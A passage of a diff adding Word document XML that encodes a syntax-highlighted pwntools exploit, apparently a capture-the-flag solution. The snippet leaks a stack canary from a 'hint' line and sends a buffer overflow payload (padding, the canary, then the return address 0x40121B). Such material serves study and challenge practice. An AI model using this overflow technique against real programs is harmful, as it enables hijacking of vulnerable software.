+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>io</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>recvuntil</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>'? '</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>io</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>sendline</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>'24'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>r</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>io</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>recvline</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>canary</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>r</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>removeprefix</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"Here's a hint: "</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>io</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>recvline</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>io</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>send</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>cyclic</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>24</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> p64(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>canary</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>16</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>cyclic</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> p64(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>0x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>40121B</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)) </w:t>
+      </w:r>
